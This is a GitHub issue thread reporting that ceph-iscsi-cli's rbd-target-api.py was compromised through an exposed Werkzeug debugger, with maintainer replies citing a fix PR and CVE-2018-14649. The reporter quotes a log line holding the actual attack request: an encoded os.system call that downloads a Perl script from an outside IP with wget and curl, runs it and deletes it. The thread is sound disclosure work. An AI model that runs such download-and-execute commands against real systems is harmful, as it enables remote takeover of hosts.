New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
rbd-target-api.py exploited. #120
Comments
|
@realasmo Thanks for the report of the exposed Werkzeug exploit. I'll open a PR to fix it ASAP. |
|
the end of the logfile contains |
|
Flask is enabling the Werkzeug debugger here [1] [1] https://github.com/ceph/ceph-iscsi-cli/blob/master/rbd-target-api.py#L2007 |
|
CVE-2018-14649 has been assigned for this flaw |
|
See PR #121 |
|
Resolved -- also ceph/ceph#24248 includes a documentation update to note that this API should not be publicly accessible. |
|
CVE-2018-14649 was assigned to this issue. See also rh#1632078 for additional information. |
Hello,
I've found that the python code was used to compromise our host remotely (in our case it was running as root so the attacker gained root privileges), the logs contains:
2018-09-23 05:23:53,267 INFO [_internal.py:87:_log()] - 185.234.217.11 - - [23/Sep/2018 05:23:53] "GET /console?s=7qfxpQm7KShU7OzAilrU&cmd=import+os%3B+os.system%28%27wget+-qO+-+http%3A%2F%2F195.22.126.16%2Fbt.txt%7Cperl%3Bcd+%2Ftmp%3Bcurl+-O+http%3A%2F%2F195.22.126.16%2Fbt.txt%3Bperl+bt.txt%3Brm+-rf+bt.txt%2A%27%29&__debugger__=yes&frm=0 HTTP/1.1" 200 -Hope this helps.
The text was updated successfully, but these errors were encountered: